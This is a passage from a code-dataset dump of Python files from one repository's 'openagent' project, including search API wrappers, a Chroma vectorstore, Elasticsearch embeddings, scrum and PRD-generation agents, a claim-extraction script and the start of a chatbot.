In the left-side menu, click Edit search engine → {your search engine name}
→ Setup Set Search the entire web to ON. Remove the URL you added from
the list of Sites to search.
- Under Search engine ID you’ll find the search-engine-ID.
4. Enable the Custom Search API
- Navigate to the APIs & Services→Dashboard panel in Cloud Console.
- Click Enable APIs and Services.
- Search for Custom Search API and click on it.
- Click Enable.
    URL for it: https://console.cloud.google.com/apis/library/customsearch.googleapis.com
"""
search_engine: Any #: :meta private:
google_api_key: Optional[str] = None
google_cse_id: Optional[str] = None
k: int = 10
siterestrict: bool = False
class Config:
"""Configuration for this pydantic object."""
extra = Extra.forbid
def _google_search_results(self, search_term: str, **kwargs: Any) -> List[dict]:
cse = self.search_engine.cse()
if self.siterestrict:
cse = cse.siterestrict()
res = cse.list(q=search_term, cx=self.google_cse_id, **kwargs).execute()
return res.get("items", [])
@root_validator()
def validate_environment(cls, values: Dict) -> Dict:
"""Validate that api key and python package exists in environment."""
google_api_key = get_from_dict_or_env(
values, "google_api_key", "GOOGLE_API_KEY"
)
values["google_api_key"] = google_api_key
google_cse_id = get_from_dict_or_env(values, "google_cse_id", "GOOGLE_CSE_ID")
values["google_cse_id"] = google_cse_id
try:
from googleapiclient.discovery import build
except ImportError:
raise ImportError(
"google-api-python-client is not installed. "
"Please install it with `pip install google-api-python-client`"
)
service = build("customsearch", "v1", developerKey=google_api_key)
values["search_engine"] = service
return values
def run(self, query: str) -> str:
"""Run query through GoogleSearch and parse result."""
snippets = []
results = self._google_search_results(query, num=self.k)
if len(results) == 0:
return "No good Google Search Result was found"
for result in results:
if "snippet" in result:
snippets.append(result["snippet"])
return " ".join(snippets)
def results(self, query: str, num_results: int) -> List[Dict]:
"""Run query through GoogleSearch and return metadata.
Args:
query: The query to search for.
num_results: The number of results to return.
Returns:
A list of dictionaries with the following keys:
snippet - The description of the result.
title - The title of the result.
link - The link to the result.
"""
metadata_results = []
results = self._google_search_results(query, num=num_results)
if len(results) == 0:
return [{"Result": "No good Google Search Result was found"}]
for result in results:
metadata_result = {
"title": result["title"],
"link": result["link"],
}
if "snippet" in result:
metadata_result["snippet"] = result["snippet"]
metadata_results.append(metadata_result)
return metadata_results | [] |
2024-01-10 | priyanshics20/test | openagent~helpers~wikipedia.py | #Code taken from the langchain Github repo; the load method was removed as it depended on langchain Documents
"""Util that calls Wikipedia."""
import logging
from typing import Any, Dict, List, Optional
from pydantic import BaseModel, Extra, root_validator
logger = logging.getLogger(__name__)
WIKIPEDIA_MAX_QUERY_LENGTH = 300
class WikipediaAPIWrapper(BaseModel):
"""Wrapper around WikipediaAPI.
To use, you should have the ``wikipedia`` python package installed.
This wrapper will use the Wikipedia API to conduct searches and
fetch page summaries. By default, it will return the page summaries
of the top-k results.
It limits the Document content by doc_content_chars_max.
"""
wiki_client: Any #: :meta private:
top_k_results: int = 3
lang: str = "en"
load_all_available_meta: bool = False
doc_content_chars_max: int = 4000
class Config:
"""Configuration for this pydantic object."""
extra = Extra.forbid
@root_validator()
def validate_environment(cls, values: Dict) -> Dict:
"""Validate that the python package exists in environment."""
try:
import wikipedia
wikipedia.set_lang(values["lang"])
values["wiki_client"] = wikipedia
except ImportError:
raise ImportError(
"Could not import wikipedia python package. "
"Please install it with `pip install wikipedia`."
)
return values
def run(self, query: str) -> str:
"""Run Wikipedia search and get page summaries."""
page_titles = self.wiki_client.search(query[:WIKIPEDIA_MAX_QUERY_LENGTH])
summaries = []
for page_title in page_titles[: self.top_k_results]:
if wiki_page := self._fetch_page(page_title):
if summary := self._formatted_page_summary(page_title, wiki_page):
summaries.append(summary)
if not summaries:
return "No good Wikipedia Search Result was found"
return "\n\n".join(summaries)[: self.doc_content_chars_max]
@staticmethod
def _formatted_page_summary(page_title: str, wiki_page: Any) -> Optional[str]:
return f"Page: {page_title}\nSummary: {wiki_page.summary}"
def _fetch_page(self, page: str) -> Optional[str]:
try:
return self.wiki_client.page(title=page, auto_suggest=False)
except (
self.wiki_client.exceptions.PageError,
self.wiki_client.exceptions.DisambiguationError,
):
return None | [] |
2024-01-10 | priyanshics20/test | openagent~fact_check~utils~base~pipeline.py | import yaml
from openagent.fact_check.utils.openai_wrapper import OpenAIChat
import os
import pathlib
class pipeline():
def __init__(self, domain, foundation_model):
#if foundation_model == 'gpt-3.5-turbo' or foundation_model == 'gpt-4':
self.company = 'openai'
self.chat = OpenAIChat(model_name=foundation_model)
self.prompts_path = os.path.join(os.path.dirname(pathlib.Path(__file__)), "../prompts/")
with open(os.path.join(self.prompts_path, "self_check.yaml"), 'r') as file:
data = yaml.load(file, Loader=yaml.FullLoader)
self.self_check_prompt = data[domain] | [] |
2024-01-10 | priyanshics20/test | playground~autoscrum~autoscrum.py | #credit: Martin Schroder
#research paper: https://arxiv.org/abs/2306.03197
#organization: Swedish Embedded Consulting Group Research
#linkedin: martinschroder
#email: [email protected]
import json
from pathlib import Path
from datetime import datetime
from openagent import compiler
import pkg_resources as pg
from openagent.llms._openai import OpenAI
compiler.llm = OpenAI("gpt-3.5-turbo")
class AutoScrum:
def __init__(self, path):
self.featurizer = self.load_program("featurizer")
self.storylizer = self.load_program("storylizer")
self.goalmaker = self.load_program("goalmaker")
self.clarifier = self.load_program("clarifier")
self.acceptance = self.load_program("acceptance")
self.taskalizer = self.load_program("taskalizer")
self.requalizer = self.load_program("requalizer")
self.planner = self.load_program("planner")
if not Path(path).exists():
self.reset()
self.save(path)
self.data = self.load_data(path)
def reset(self):
self.data = {
"product": "Your product name",
"vision": "Your product vision",
"niche": "Your product niche",
"current_state": {},
"desired_state": {},
"plan": [],
"requirements": [],
"sprint_duration": "2 weeks",
"features": [],
"stories": [],
"avoid": []
}
def load_data(self, path):
"""
Loads data json file
"""
return json.loads(Path(path).read_text())
def load_program(self, name: str):
path = pg.resource_filename(__name__, f'data/{name}.hbs')
return compiler(Path(path).read_text(), silent=True)
def save(self, path):
Path(path).write_text(json.dumps(self.data, indent=4))
def gen_plan(self, count:int):
prog = self.planner(
current_state=self.data["current_state"],
desired_state=self.data["desired_state"],
plan=[p["task"] for p in self.data["plan"]],
count=count
)
try:
# print(prog)
obj = json.loads(prog["response"])
return obj
except:
# print(prog)
print("Error: JSON conversion failed")
return []
def add_plan(self, steps: list):
self.data["plan"].extend(steps)
@property
def plan(self):
return self.data["plan"]
def gen_requirements(self, count:int):
prog = self.requalizer(
product=self.data["product"],
vision=self.data["vision"],
niche=self.data["niche"],
current_state=self.data["current_state"],
desired_state=self.data["desired_state"],
requirements=[f["name"] for f in self.data["requirements"]],
count=count
)
try:
# print(prog)
obj = json.loads(prog["response"])
return obj
except:
print(prog)
print("Error: JSON conversion failed")
return []
def add_requirements(self, reqs: list):
self.data["requirements"].extend(reqs)
@property
def requirements(self):
return self.data["requirements"]
def gen_features(self, count:int):
prog = self.featurizer(
product=self.data["product"],
vision=self.data["vision"],
requirements=[req["description"] for req in self.data["requirements"]],
story_features=[s["feature"] for s in self.data["stories"]],
features = [feature["name"] for feature in self.data["features"]],
avoid=self.data["avoid"],
count=count
)
try:
print(prog)
obj = json.loads(prog["response"])
return obj
except:
print(prog)
print("Error: JSON conversion failed")
return []
def add_features(self, features: list):
self.data["features"].extend(features)
@property
def features(self):
return self.data["features"]
def gen_stories(self, count:int):
prog = self.storylizer(
product=self.data["product"],
niche=self.data["niche"],
vision=self.data["vision"],
features = [feature["name"] for feature in self.data["features"]],
current_state=self.data["current_state"],
desired_state=self.data["desired_state"],
stories = [story["name"] for story in self.data["stories"]],
count=count
)
print(prog)
return json.loads(prog["response"])
def add_stories(self, stories: list):
self.data["stories"].extend(stories)
@property
def stories(self):
return self.data["stories"]
def gen_goals(self, count:int):
prog = self.goalmaker(
project=self.data["project"],
sprint_duration=self.data["sprint_duration"],
product_vision=self.data["goal"],
backlog = [story["name"] for story in self.data["stories"]],
goals = [goal["title"] for goal in self.data["goals"]],
count=count
)
print(prog)
return json.loads(prog["goals"])
def add_goals(self, goals: list):
self.data["goals"].extend(goals)
@property
def goals(self):
return self.data["goals"]
def gen_acceptance_criteria(self, story, count:int):
prog = self.acceptance(
product=self.data["product"],
requirements=[req["description"] for req in self.data["requirements"]],
story=story,
count=count
)
print(prog)
return json.loads(prog["response"])
def gen_tasks(self, story, count:int):
prog = self.taskalizer(
product=self.data["product"],
story=story,
count=count
)
print(prog)
return json.loads(prog["response"])
def gen_clarification(self, story, count:int):
prog = self.clarifier(
story=story,
completed_tasks=[],
resources=[],
count=count
)
print(prog)
return json.loads(prog["response"])
| [] |
2024-01-10 | priyanshics20/test | openagent~finetune~LLMFinetune.py | from abc import ABC, abstractmethod
from logging import Logger
import openai
class LLMFinetune(ABC):
def __init__(self, logger: Logger, openai_key: str):
self.logger = logger
openai.api_key = openai_key
@abstractmethod
    def transform_data(self, train_csv_file: str, val_csv_file: str, train_output_file: str, val_output_file: str) -> str:
pass
@abstractmethod
def finetune(self, **kwargs):
pass
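# A minimal sketch of a concrete subclass (illustrative only; the transformation
# below is a placeholder, not a real fine-tuning data pipeline).
class ExampleFinetune(LLMFinetune):
    def transform_data(self, train_csv_file: str, val_csv_file: str, train_output_file: str, val_output_file: str) -> str:
        # A real implementation would convert the CSV rows into the JSONL format
        # expected by the fine-tuning API and write them to the output files.
        self.logger.info("Transforming %s and %s", train_csv_file, val_csv_file)
        return train_output_file
    def finetune(self, **kwargs):
        # A real implementation would upload the prepared files and start a
        # fine-tuning job via the OpenAI API.
        self.logger.info("Starting fine-tune with kwargs: %s", kwargs)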
| [] |
2024-01-10 | priyanshics20/test | playground~prd_agent~prd.py |
from typing import List, Tuple
from openagent import compiler
from openagent.llms._openai import OpenAI
import pkg_resources as pg
from pathlib import Path
path = pg.resource_filename(__name__, 'prompts/prd.hbs')
prd_prompt_template = Path(path).read_text()
path = pg.resource_filename(__name__, 'prompts/prompt.hbs')
prompt_template = Path(path).read_text()
# prompt_template.format(FORMAT_EXAMPLE)
llm = OpenAI("gpt-4")
engine = compiler(template = prompt_template, llm = llm, silent=True)
class PRDDeveloper:
def __init__(self, goal = None, prd_prompt_template = prd_prompt_template, engine = engine
):
self.goal = goal
self.prd_prompt_template = prd_prompt_template
self.engine = engine
def run(self):
output = self.engine(goal = self.goal, prompt_template = self.prd_prompt_template)
return output['response']
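# Minimal usage sketch (illustrative; the goal text is an arbitrary example).
if __name__ == "__main__":
    developer = PRDDeveloper(goal="Build a note-taking app for dental researchers")
    print(developer.run())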
| [] |
2024-01-10 | priyanshics20/test | openagent~vectorstores~embeddings~elasticsearch.py | from __future__ import annotations
from typing import TYPE_CHECKING, List, Optional, Any
from openagent.utils import get_from_env
if TYPE_CHECKING:
from elasticsearch import Elasticsearch
from elasticsearch.client import MlClient
from openagent.vectorstores.embeddings.base import Embeddings
class ElasticsearchEmbeddings(Embeddings):
"""
Wrapper around Elasticsearch embedding models.
This class provides an interface to generate embeddings using a model deployed
in an Elasticsearch cluster. It requires an Elasticsearch connection object
and the model_id of the model deployed in the cluster.
In Elasticsearch you need to have an embedding model loaded and deployed.
- https://www.elastic.co/guide/en/elasticsearch/reference/current/infer-trained-model.html
- https://www.elastic.co/guide/en/machine-learning/current/ml-nlp-deploy-models.html
""" # noqa: E501
def __init__(
self,
client: Any,
model_id: str,
*,
input_field: str = "text_field",
):
"""
Initialize the ElasticsearchEmbeddings instance.
Args:
client (MlClient): An Elasticsearch ML client object.
model_id (str): The model_id of the model deployed in the Elasticsearch
cluster.
input_field (str): The name of the key for the input text field in the
document. Defaults to 'text_field'.
"""
self.client = client
self.model_id = model_id
self.input_field = input_field
@classmethod
def from_credentials(
cls,
model_id: str,
*,
es_cloud_id: Optional[str] = None,
es_user: Optional[str] = None,
es_password: Optional[str] = None,
input_field: str = "text_field",
) -> ElasticsearchEmbeddings:
"""Instantiate embeddings from Elasticsearch credentials.
Args:
model_id (str): The model_id of the model deployed in the Elasticsearch
cluster.
input_field (str): The name of the key for the input text field in the
document. Defaults to 'text_field'.
es_cloud_id: (str, optional): The Elasticsearch cloud ID to connect to.
es_user: (str, optional): Elasticsearch username.
es_password: (str, optional): Elasticsearch password.
Example:
.. code-block:: python
from langchain.embeddings import ElasticsearchEmbeddings
# Define the model ID and input field name (if different from default)
model_id = "your_model_id"
# Optional, only if different from 'text_field'
input_field = "your_input_field"
# Credentials can be passed in two ways. Either set the env vars
# ES_CLOUD_ID, ES_USER, ES_PASSWORD and they will be automatically
# pulled in, or pass them in directly as kwargs.
embeddings = ElasticsearchEmbeddings.from_credentials(
model_id,
input_field=input_field,
# es_cloud_id="foo",
# es_user="bar",
# es_password="baz",
)
documents = [
"This is an example document.",
"Another example document to generate embeddings for.",
]
            embeddings.embed_documents(documents)
"""
try:
from elasticsearch import Elasticsearch
from elasticsearch.client import MlClient
except ImportError:
raise ImportError(
"elasticsearch package not found, please install with 'pip install "
"elasticsearch'"
)
es_cloud_id = es_cloud_id or get_from_env("es_cloud_id", "ES_CLOUD_ID")
es_user = es_user or get_from_env("es_user", "ES_USER")
es_password = es_password or get_from_env("es_password", "ES_PASSWORD")
# Connect to Elasticsearch
es_connection = Elasticsearch(
cloud_id=es_cloud_id, basic_auth=(es_user, es_password)
)
client = MlClient(es_connection)
return cls(client, model_id, input_field=input_field)
@classmethod
def from_es_connection(
cls,
model_id: str,
es_connection: Elasticsearch,
input_field: str = "text_field",
) -> ElasticsearchEmbeddings:
"""
Instantiate embeddings from an existing Elasticsearch connection.
This method provides a way to create an instance of the ElasticsearchEmbeddings
class using an existing Elasticsearch connection. The connection object is used
to create an MlClient, which is then used to initialize the
ElasticsearchEmbeddings instance.
Args:
model_id (str): The model_id of the model deployed in the Elasticsearch cluster.
es_connection (elasticsearch.Elasticsearch): An existing Elasticsearch
connection object. input_field (str, optional): The name of the key for the
input text field in the document. Defaults to 'text_field'.
Returns:
ElasticsearchEmbeddings: An instance of the ElasticsearchEmbeddings class.
Example:
.. code-block:: python
from elasticsearch import Elasticsearch
from langchain.embeddings import ElasticsearchEmbeddings
# Define the model ID and input field name (if different from default)
model_id = "your_model_id"
# Optional, only if different from 'text_field'
input_field = "your_input_field"
# Create Elasticsearch connection
es_connection = Elasticsearch(
hosts=["localhost:9200"], http_auth=("user", "password")
)
# Instantiate ElasticsearchEmbeddings using the existing connection
embeddings = ElasticsearchEmbeddings.from_es_connection(
model_id,
es_connection,
input_field=input_field,
)
documents = [
"This is an example document.",
"Another example document to generate embeddings for.",
]
            embeddings.embed_documents(documents)
"""
# Importing MlClient from elasticsearch.client within the method to
# avoid unnecessary import if the method is not used
from elasticsearch.client import MlClient
# Create an MlClient from the given Elasticsearch connection
client = MlClient(es_connection)
# Return a new instance of the ElasticsearchEmbeddings class with
# the MlClient, model_id, and input_field
return cls(client, model_id, input_field=input_field)
def _embedding_func(self, texts: List[str]) -> List[List[float]]:
"""
Generate embeddings for the given texts using the Elasticsearch model.
Args:
texts (List[str]): A list of text strings to generate embeddings for.
Returns:
List[List[float]]: A list of embeddings, one for each text in the input
list.
"""
response = self.client.infer_trained_model(
model_id=self.model_id, docs=[{self.input_field: text} for text in texts]
)
embeddings = [doc["predicted_value"] for doc in response["inference_results"]]
return embeddings
def embed_documents(self, texts: List[str]) -> List[List[float]]:
"""
Generate embeddings for a list of documents.
Args:
texts (List[str]): A list of document text strings to generate embeddings
for.
Returns:
List[List[float]]: A list of embeddings, one for each document in the input
list.
"""
return self._embedding_func(texts)
def embed_query(self, text: str) -> List[float]:
"""
Generate an embedding for a single query text.
Args:
text (str): The query text to generate an embedding for.
Returns:
List[float]: The embedding for the input query text.
"""
return self._embedding_func([text])[0] | [] |
2024-01-10 | priyanshics20/test | openagent~fact_check~utils~claim_extractor.py | import os
import pathlib
import openai
import yaml
import json
import asyncio
from tqdm import tqdm
from openagent.fact_check.env_config import factool_env_config
# env
# openai.api_key = factool_env_config.openai_api_key
config = {
'model_name': 'gpt-3.5-turbo',
'max_tokens': 2000,
'temperature': 0.0,
'top_p': 1,
'frequency_penalty': 0.0,
'presence_penalty': 0.0,
'n': 1
}
# Make api calls asynchronously
async def run_api(messages):
async def single_run(message):
        # use the async variant so asyncio.gather can actually run the calls concurrently
        output = await openai.ChatCompletion.acreate(
model=config['model_name'],
messages=message,
max_tokens=config['max_tokens'],
temperature=config['temperature'],
top_p=config['top_p'],
frequency_penalty=config['frequency_penalty'],
presence_penalty=config['presence_penalty'],
n=config['n'],
)
return output.choices[0].message.content.strip()
responses = [single_run(messages[index]) for index in range(len(messages))]
return await asyncio.gather(*responses)
# Import data from scientific.json
scientific_list = []
with open("../datasets/scientific/scientific.json", "r") as f:
data = json.load(f)
for dict_data in data:
cur_dict = {'dataset_name': 'scientific',
'question': dict_data["question"],
'factual_response': dict_data['factual_response']}
scientific_list.append(cur_dict)
# Apply template prompt
with open("./prompts/claim_extraction.yaml") as f:
data = yaml.load(f, Loader=yaml.FullLoader)
prompt = data['scientific']
messages_list = [
[
{"role": "system", "content": prompt['system']},
{"role": "user", "content": prompt['user'].format(input=sample['factual_response'])},
]
for sample in scientific_list
]
assert len(messages_list) == len(scientific_list), "The data length is different"
# Run the API to get the output
print("begin claims extraction...")
results = asyncio.run(run_api(messages_list))
for i in range(len(scientific_list)):
scientific_list[i]["claims"] = results[i]
with open('../datasets/scientific/scientific_claims.json', 'w') as f:
json.dump(scientific_list, f, indent=4)
"""
The scientific_claims.json file saved by the above code may have format problems, here are some adjustments
"""
with open("../datasets/scientific/scientific_claims.json", "r") as f:
data = json.load(f)
for data_i in tqdm(data, total=len(data)):
try:
data_i["claims"] = json.loads(data_i["claims"].strip())
    except Exception:
print(data_i["claims"])
continue
with open("../datasets/scientific/scientific_claims.json", "w") as f:
json.dump(data, f, indent=4)
| [
"scientific",
"factual_response"
] |
2024-01-10 | priyanshics20/test | openagent~helpers~wolframalpha.py | #Code taken directly from langchain gihub repo
"""Util that calls WolframAlpha."""
from typing import Any, Dict, Optional
from pydantic import BaseModel, Extra, root_validator
from openagent.utils import get_from_dict_or_env
class WolframAlphaAPIWrapper(BaseModel):
"""Wrapper for Wolfram Alpha.
Docs for using:
1. Go to wolfram alpha and sign up for a developer account
2. Create an app and get your APP ID
3. Save your APP ID into WOLFRAM_ALPHA_APPID env variable
4. pip install wolframalpha
"""
wolfram_client: Any #: :meta private:
wolfram_alpha_appid: Optional[str] = None
class Config:
"""Configuration for this pydantic object."""
extra = Extra.forbid
@root_validator()
def validate_environment(cls, values: Dict) -> Dict:
"""Validate that api key and python package exists in environment."""
wolfram_alpha_appid = get_from_dict_or_env(
values, "wolfram_alpha_appid", "WOLFRAM_ALPHA_APPID"
)
values["wolfram_alpha_appid"] = wolfram_alpha_appid
try:
import wolframalpha
except ImportError:
raise ImportError(
"wolframalpha is not installed. "
"Please install it with `pip install wolframalpha`"
)
client = wolframalpha.Client(wolfram_alpha_appid)
values["wolfram_client"] = client
return values
def run(self, query: str) -> str:
"""Run query through WolframAlpha and parse result."""
res = self.wolfram_client.query(query)
try:
assumption = next(res.pods).text
answer = next(res.results).text
except StopIteration:
return "Wolfram Alpha wasn't able to answer it"
if answer is None or answer == "":
# We don't want to return the assumption alone if answer is empty
return "No good Wolfram Alpha Result was found"
else:
return f"Assumption: {assumption} \nAnswer: {answer}" | [] |
2024-01-10 | priyanshics20/test | openagent~helpers~bingsearch.py | #Directly taken from Langchain Github Repo
"""Util that calls Bing Search.
In order to set this up, follow instructions at:
https://levelup.gitconnected.com/api-tutorial-how-to-use-bing-web-search-api-in-python-4165d5592a7e
"""
from typing import Dict, List
import requests
from pydantic import BaseModel, Extra, root_validator
from openagent.utils import get_from_dict_or_env
class BingSearchAPIWrapper(BaseModel):
"""Wrapper for Bing Search API.
In order to set this up, follow instructions at:
https://levelup.gitconnected.com/api-tutorial-how-to-use-bing-web-search-api-in-python-4165d5592a7e
"""
bing_subscription_key: str
bing_search_url: str
k: int = 10
class Config:
"""Configuration for this pydantic object."""
extra = Extra.forbid
def _bing_search_results(self, search_term: str, count: int) -> List[dict]:
headers = {"Ocp-Apim-Subscription-Key": self.bing_subscription_key}
params = {
"q": search_term,
"count": count,
"textDecorations": True,
"textFormat": "HTML",
}
response = requests.get(
self.bing_search_url, headers=headers, params=params # type: ignore
)
response.raise_for_status()
search_results = response.json()
return search_results["webPages"]["value"]
@root_validator(pre=True)
def validate_environment(cls, values: Dict) -> Dict:
"""Validate that api key and endpoint exists in environment."""
bing_subscription_key = get_from_dict_or_env(
values, "bing_subscription_key", "BING_SUBSCRIPTION_KEY"
)
values["bing_subscription_key"] = bing_subscription_key
bing_search_url = get_from_dict_or_env(
values,
"bing_search_url",
"BING_SEARCH_URL",
# default="https://api.bing.microsoft.com/v7.0/search",
)
values["bing_search_url"] = bing_search_url
return values
def run(self, query: str) -> str:
"""Run query through BingSearch and parse result."""
snippets = []
results = self._bing_search_results(query, count=self.k)
if len(results) == 0:
return "No good Bing Search Result was found"
for result in results:
snippets.append(result["snippet"])
return " ".join(snippets)
def results(self, query: str, num_results: int) -> List[Dict]:
"""Run query through BingSearch and return metadata.
Args:
query: The query to search for.
num_results: The number of results to return.
Returns:
A list of dictionaries with the following keys:
snippet - The description of the result.
title - The title of the result.
link - The link to the result.
"""
metadata_results = []
results = self._bing_search_results(query, count=num_results)
if len(results) == 0:
return [{"Result": "No good Bing Search Result was found"}]
for result in results:
metadata_result = {
"snippet": result["snippet"],
"title": result["name"],
"link": result["url"],
}
metadata_results.append(metadata_result)
return metadata_results | [] |
2024-01-10 | priyanshics20/test | openagent~vectorstores~chroma.py | import uuid
from openagent.schema import Document
from openagent.vectorstores.base import VectorStore
from typing import Any, Optional, Iterable, List, Dict
from openagent.vectorstores.embeddings.base import Embeddings
import chromadb
import chromadb.config
class Chroma(VectorStore):
"""Wrapper around ChromaDB embeddings platform.
To use, you should have the ``chromadb`` python package installed.
Example:
.. code-block:: python
from openagent.vectorstores import Chroma
from openagent.embeddings.openai import OpenAIEmbeddings
embeddings = OpenAIEmbeddings()
vectorstore = Chroma("openagent_collection", embeddings)
"""
def __init__(
self,
collection_name: str = "openagent",
embedding_function: Optional[Embeddings] = None,
persist_directory: Optional[str] = None,
client_settings: Optional[chromadb.config.Settings] = None,
collection_metadata: Optional[Dict] = None,
client: Optional[chromadb.Client] = None,
) -> None:
"""Initialize with Chroma client."""
try:
import chromadb
import chromadb.config
except ImportError:
raise ValueError(
"Could not import chromadb python package. "
"Please install it with `pip install chromadb`."
)
if client is not None:
self._client = client
else:
if client_settings:
self._client_settings = client_settings
else:
self._client_settings = chromadb.config.Settings()
if persist_directory is not None:
self._client_settings = chromadb.config.Settings(
chroma_db_impl="duckdb+parquet",
persist_directory=persist_directory,
)
self._client = chromadb.Client(self._client_settings)
self._embedding_function = embedding_function
self._persist_directory = persist_directory
self._collection = self._client.get_or_create_collection(
name=collection_name,
embedding_function=self._embedding_function.embed_documents
if self._embedding_function is not None
else None,
metadata=collection_metadata,
)
def add_texts(
self,
texts: Iterable[str],
metadatas: Optional[List[dict]] = None,
ids: Optional[List[str]] = None,
**kwargs: Any,
) -> List[str]:
ids = ids or [str(uuid.uuid1()) for _ in texts]
embeddings = None
if self._embedding_function is not None:
embeddings = self._embedding_function.embed_documents(list(texts))
self._collection.add(
metadatas=metadatas, embeddings=embeddings, documents=texts, ids=ids
)
return ids
def similarity_search(
self,
query: Optional[str] = None,
embedding: Optional[List[float]] = None,
top_k: int = 5,
**kwargs: Any
) -> List[Document]:
"""Return docs most similar to query and respective distance score"""
if (embedding is None and query is None) or (embedding is not None and query is not None):
raise ValueError("You must provide either query embeddings or query texts, but not both")
search_results = []
if self._embedding_function is None:
if query is not None:
results = self._collection.query(
query_texts=[query],
n_results=top_k,
**kwargs,
)
else:
results = self._collection.query(
query_embeddings=[embedding],
n_results=top_k,
**kwargs,
)
else:
if query is not None:
query_embedding = self._embedding_function.embed_query(text=query)
results = self._collection.query(
query_embeddings=[query_embedding],
n_results=top_k,
**kwargs,
)
else:
results = self._collection.query(
query_embeddings=[embedding],
n_results=top_k,
**kwargs,
)
for result in zip(
results["documents"][0],
results["metadatas"][0],
results["distances"][0],
):
document = Document(page_content=result[0], metadata=result[1] or {})
search_results.append((document, result[2]))
return search_results
def delete_collection(self) -> None:
"""Delete the collection."""
self._client.delete_collection(self._collection.name)
def get(self, include: Optional[List[str]] = None) -> Dict[str, Any]:
"""Gets the collection.
Args:
include (Optional[List[str]]): List of fields to include from db.
Defaults to None.
"""
if include is not None:
return self._collection.get(include=include)
else:
return self._collection.get()
def persist(self) -> None:
"""Persist the collection.
This can be used to explicitly persist the data to disk.
It will also be called automatically when the object is destroyed.
"""
if self._persist_directory is None:
raise ValueError(
"You must specify a persist_directory on"
"creation to persist the collection."
)
self._client.persist()
def update_document(self, document_id: str, document: Document) -> None:
# Update a document in the collection.
text = document.page_content
metadata = document.metadata
if self._embedding_function is None:
raise ValueError(
"For update, you must specify an embedding function on creation."
)
        # the Embeddings interface exposes embed_documents, not get_document_embedding
        embeddings = self._embedding_function.embed_documents([text])
self._collection.update(
ids=[document_id],
embeddings=embeddings,
documents=[text],
metadatas=[metadata],
)
@classmethod
def from_texts(
cls,
texts: List[str],
embedding_function: Optional[Embeddings] = None,
metadatas: Optional[List[dict]] = None,
ids: Optional[List[str]] = None,
collection_name: str = "openagent",
persist_directory: Optional[str] = None,
client_settings: Optional[chromadb.config.Settings] = None,
client: Optional[chromadb.Client] = None,
**kwargs: Any,
):
"""Create a Chroma vectorstore from a raw documents.
If a persist_directory is specified, the collection will be persisted there.
Otherwise, the data will be ephemeral in-memory.
Args:
texts (List[str]): List of texts to add to the collection.
collection_name (str): Name of the collection to create.
persist_directory (Optional[str]): Directory to persist the collection.
embedding (Optional[Embeddings]): Embedding function. Defaults to None.
metadatas (Optional[List[dict]]): List of metadatas. Defaults to None.
ids (Optional[List[str]]): List of document IDs. Defaults to None.
client_settings (Optional[chromadb.config.Settings]): Chroma client settings
Returns:
Chroma: Chroma vectorstore.
"""
chroma_collection = cls(
collection_name=collection_name,
embedding_function=embedding_function,
persist_directory=persist_directory,
client_settings=client_settings,
client=client,
)
chroma_collection.add_texts(texts=texts, metadatas=metadatas, ids=ids)
return chroma_collection
@classmethod
def from_documents(
cls,
documents: List[Document],
embedding_function: Optional[Embeddings] = None,
ids: Optional[List[str]] = None,
collection_name: str = "openagent",
persist_directory: Optional[str] = None,
client_settings: Optional[chromadb.config.Settings] = None,
client: Optional[chromadb.Client] = None, # Add this line
**kwargs: Any,
):
"""Create a Chroma vectorstore from a list of documents.
If a persist_directory is specified, the collection will be persisted there.
Otherwise, the data will be ephemeral in-memory.
Args:
collection_name (str): Name of the collection to create.
persist_directory (Optional[str]): Directory to persist the collection.
ids (Optional[List[str]]): List of document IDs. Defaults to None.
documents (List[Document]): List of documents to add to the vectorstore.
embedding (Optional[Embeddings]): Embedding function. Defaults to None.
client_settings (Optional[chromadb.config.Settings]): Chroma client settings
Returns:
Chroma: Chroma vectorstore.
"""
texts = [doc.page_content for doc in documents]
metadatas = [doc.metadata for doc in documents]
return cls.from_texts(
texts=texts,
            embedding_function=embedding_function,
metadatas=metadatas,
ids=ids,
collection_name=collection_name,
persist_directory=persist_directory,
client_settings=client_settings,
client=client,
**kwargs
) | [] |
2024-01-10 | atlomak/leothon | app~gptintegrator.py | import os
import openai
openai.api_type = "azure"
openai.api_version = "2022-12-01"
openai.api_base = os.getenv("OPENAI_ENDPOINT")
openai.api_key = os.getenv("OPENAI_API_KEY")
def get_openai_sympthoms(prompt: str):
response = openai.Completion.create(
engine="TextDaVinci003",
prompt=f"""
Podsumuj objawy pacjenta na podstawie transkrypcji rozmowy w pojedyńczych prostych zdaniach/słowach.
Przykład: Ból gardła, rano. Brak gorączki. Problemy ze snem od dłuższego czasu.
Rozmowa: {prompt}
""",
max_tokens=750,
temperature=0,
)
return response['choices'][0]['text']
def get_openai_recommendations(prompt: str):
response = openai.Completion.create(
engine="TextDaVinci003",
prompt=f"""
Podsumuj zalecenia lekarza oraz jakie leki powinien przyjmować pacjent na podstawie rozmowy. Nie dodawaj nic od siebie! Napisz bardzo zwięźle.
Rozmowa: {prompt}
""",
max_tokens=750,
temperature=0,
)
return response['choices'][0]['text'] | [
"\n Podsumuj zalecenia lekarza oraz jakie leki powinien przyjmować pacjent na podstawie rozmowy. Nie dodawaj nic od siebie! Napisz bardzo zwięźle.\n Rozmowa: PLACEHOLDER\n ",
"\n Podsumuj objawy pacjenta na podstawie transkrypcji rozmowy w pojedyńczych prostych zdaniach/słowach.\n Przykład: Ból gardła, rano. Brak gorączki. Problemy ze snem od dłuższego czasu.\n Rozmowa: PLACEHOLDER\n "
] |
2024-01-10 | Yeok-c/track-token-usage | example.py | from src.track_usage import TokenTrack
from langchain.callbacks import get_openai_callback
from langchain.chains import LLMChain
from langchain.chat_models import ChatOpenAI
from langchain.prompts import ChatPromptTemplate
class YourClass(TokenTrack):
def __init__(self):
super(YourClass, self).__init__()
def your_function(self):
with get_openai_callback() as cb:
# any langchain function to be calculated
results = LLMChain(
llm=ChatOpenAI(),
prompt=ChatPromptTemplate.from_template("What's the capitol of {country}? List 20 top attractions there"),
verbose=True
).run("France")
print(results)
self.update_usage(cb)
def whenever_you_want_to_check(self):
self.print_usage()
if __name__ == "__main__":
yourclass = YourClass()
yourclass.your_function() | [
"What's the capitol of {country}? List 20 top attractions there"
] |
2024-01-10 | dedol1/VCABuddy | VCABuddy~chat~chat_bot.py | from datetime import datetime
from django.conf import settings
import os
# from TTS.api import TTS
from gtts import gTTS
import openai
from chat.load_speaker_module import speaker_encoder_model_twi, speaker_encoder_model_ewe
class Chatbot:
def __init__(self, api_key):
openai.api_key = api_key
def get_response(self, user_input, language, input_type):
# Define context in both Twi and English
context_en = """
Context: MTN Network Service Provider
